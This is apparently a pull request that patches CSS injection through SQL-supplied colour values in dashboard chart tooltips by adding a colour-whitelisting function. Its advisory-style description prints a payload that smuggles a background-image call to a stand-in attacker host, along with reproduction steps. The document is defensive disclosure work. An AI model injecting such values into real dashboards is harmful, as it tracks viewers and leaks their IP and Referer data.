### PR TITLE
Fix possible CSS injection

### DIFF
--- a/ui/src/components/charts/BarChart.tsx
+++ b/ui/src/components/charts/BarChart.tsx
@@ -14,6 +14,7 @@ import { ChartHoverContext } from "../../contexts/ChartHoverContext";
 import { DarkModeContext } from "../../contexts/DarkModeContext";
 import { Column, isDatableType, isTimeType, MarkLine } from "../../lib/types";
 import { formatValue, echartsEncode } from "../../lib/render";
+import { safeColor } from "../../lib/safeColor";
 import { translate } from "../../lib/translate";
 import { EChart } from "./EChart";
 
@@ -319,7 +320,7 @@ const BarChart = (props: BarChartProps) => {
             const formattedValue = valueFormatter(value);
             tooltipContent += `<div class="flex items-center justify-between space-x-2">
               <div class="flex items-center space-x-2">
-                <span class="inline-block size-2 rounded-sm" style="background-color: ${echartsEncode(param.color)}"></span>
+                <span class="inline-block size-2 rounded-sm" style="background-color: ${safeColor(param.color)}"></span>
                 ${categories.length > 1 ? `<span>${echartsEncode(param.seriesName)}</span>` : ""}
               </div>
               <span class="font-medium">${echartsEncode(formattedValue)}</span>

--- a/ui/src/components/charts/Boxplot.tsx
+++ b/ui/src/components/charts/Boxplot.tsx
@@ -13,6 +13,7 @@ import { ChartHoverContext } from "../../contexts/ChartHoverContext";
 import { DarkModeContext } from "../../contexts/DarkModeContext";
 import { Column, isDatableType, MarkLine } from "../../lib/types";
 import { formatValue, echartsEncode } from "../../lib/render";
+import { safeColor } from "../../lib/safeColor";
 import { translate } from "../../lib/translate";
 import { EChart } from "./EChart";
 
@@ -237,7 +238,7 @@ const Boxplot = (props: BoxplotProps) => {
             const formattedValue = valueFormatter(values[1], true);
             const color = colorByIndex.get(values[0]) || primaryColor;
             tooltipContent += `<div class="flex items-center space-x-2">
-                <span class="inline-block size-3 rounded-full" style="background-color: ${echartsEncode(color)}"></span>
+                <span class="inline-block size-3 rounded-full" style="background-color: ${safeColor(color)}"></span>
                 <span class="text-sm font-medium">${echartsEncode(formattedValue)}</span>
               </div>`;
             const extraData = Object.entries(values[2]);

--- a/ui/src/components/charts/LineChart.tsx
+++ b/ui/src/components/charts/LineChart.tsx
@@ -14,6 +14,7 @@ import { ChartHoverContext } from "../../contexts/ChartHoverContext";
 import { DarkModeContext } from "../../contexts/DarkModeContext";
 import { Column, isDatableType, MarkLine } from "../../lib/types";
 import { formatValue, echartsEncode } from "../../lib/render";
+import { safeColor } from "../../lib/safeColor";
 import { EChart } from "./EChart";
 
 interface LineChartProps extends React.HTMLAttributes<HTMLDivElement> {
@@ -278,7 +279,7 @@ const LineChart = (props: LineChartProps) => {
             const formattedValue = valueFormatter(value);
             tooltipContent += `<div class="flex items-center justify-between space-x-2">
               <div class="flex items-center space-x-2">
-                <span class="inline-block size-2 rounded-sm" style="background-color: ${echartsEncode(param.color)}"></span>
+                <span class="inline-block size-2 rounded-sm" style="background-color: ${safeColor(param.color)}"></span>
                 ${categories.length > 1 ? `<span>${echartsEncode(param.seriesName)}</span>` : ""}
               </div>
               <span class="font-medium">${echartsEncode(formattedValue)}</span>

--- a/ui/src/components/charts/PieChart.tsx
+++ b/ui/src/components/charts/PieChart.tsx
@@ -13,6 +13,7 @@ import { cx } from "../../lib/utils";
 import { DarkModeContext } from "../../contexts/DarkModeContext";
 import { Column } from "../../lib/types";
 import { formatValue, echartsEncode } from "../../lib/render";
+import { safeColor } from "../../lib/safeColor";
 import { translate } from "../../lib/translate";
 import { EChart } from "./EChart";
 
@@ -170,7 +171,7 @@ const PieChart = (props: PieChartProps) => {
           const percentage = params.percent.toFixed(1);
           let tooltipContent = `<div class="text-sm">
             <div class="flex items-center space-x-2">
-              <span class="inline-block size-2 rounded-sm" style="background-color: ${echartsEncode(params.color)}"></span>
+              <span class="inline-block size-2 rounded-sm" style="background-color: ${safeColor(params.color)}"></span>
               <span class="font-medium">${echartsEncode(params.name)}</span>
             </div>`;
 

--- a/ui/src/lib/safeColor.ts
+++ b/ui/src/lib/safeColor.ts
@@ -1,0 +1,25 @@
+// SPDX-License-Identifier: MPL-2.0
+
+// HTML-escaping (echarts.format.encodeHTML) does not block CSS injection
+// when a value is interpolated into a `style="..."` attribute, because it
+// leaves `;`, `:`, `(`, `)` untouched. SQL-supplied colors (the `color`-tagged
+// column on pie/bar/line/boxplot dashboards) reach the tooltip style
+// attribute, so we whitelist known-safe CSS color syntaxes and drop the
+// rest. Anything unrecognised becomes an empty string and the chart falls
+// back to its theme color.
+
+const HEX = /^#[0-9a-fA-F]{3,8}$/;
+const NAMED = /^[a-zA-Z]+$/;
+const COLOR_FN = /^(rgb|rgba|hsl|hsla|hwb|lab|lch|oklab|oklch|color)\([0-9a-zA-Z\s,./%-]+\)$/;
+const VAR_REF = /^var\(--[a-zA-Z0-9_-]+\)$/;
+
+export function safeColor (input: string | null | undefined): string {
+  if (input == null) return "";
+  const trimmed = String(input).trim();
+  if (!trimmed) return "";
+  if (HEX.test(trimmed)) return trimmed;
+  if (NAMED.test(trimmed)) return trimmed;
+  if (COLOR_FN.test(trimmed)) return trimmed;
+  if (VAR_REF.test(trimmed)) return trimmed;
+  return "";
+}


### PR DESCRIPTION
CSS injection via SQL-supplied `color` column in chart tooltips

**Severity:** Medium. No JavaScript execution, but stored CSS injection allowing external resource loads from any dashboard viewer (IP / Referer / timing leak, phishing surface via background images).

**Where it lives:** `main` branch, commit `7c27eba` and earlier. Tooltip formatters in `ui/src/components/charts/{BarChart,LineChart,PieChart,Boxplot}.tsx`.

The dashboard chart tooltips render their swatch color via a raw HTML string that ECharts injects unescaped:

```jsx
<span class="inline-block size-2 rounded-sm"
      style="background-color: ${echartsEncode(param.color)}"></span>
```

`echartsEncode` wraps `echarts.format.encodeHTML`, which only escapes the HTML specials `<>&"'`. It leaves `;`, `:`, `(`, `)` untouched. The `param.color` value originates from the `color`-tagged SQL column on a dashboard query and flows through unvalidated:

- `ui/src/components/dashboard/DashboardPieChart.tsx:145`
- `ui/src/components/dashboard/DashboardBarChart.tsx:75-82`
- `ui/src/components/dashboard/DashboardBoxplot.tsx:60-61`

A dashboard author (or anyone able to influence one of those `color` cells) can therefore return a value such as:

```
red; background-image: url(https://attacker.example/exfil?c=1)
```

When the tooltip renders, the browser parses the style attribute, applies `background-color: red`, and then fires a GET against `attacker.example` carrying the viewer's IP, Referer, and request timing.

- Out-of-band exfiltration channel from any chart that exposes a `color` column, including embedded / public-link dashboards.
- Side-channel for viewer identification (IP, Referer, cookies on cross-site responses).
- Phishing / UI-redress surface via attacker-controlled background images.
- Modern browsers block `javascript:` and `expression()` inside CSS `url()`, so this is not a direct stored-XSS vector. It is a stored CSS injection with data-exfiltration impact.

1. Create a dashboard query with a `color`-tagged column and have it return the literal string `red; background-image: url(https://YOUR-LISTENER/x)`.
2. Open the dashboard and hover over the corresponding tooltip.
3. The listener records a request from the viewer.

Thank you @mediabakery!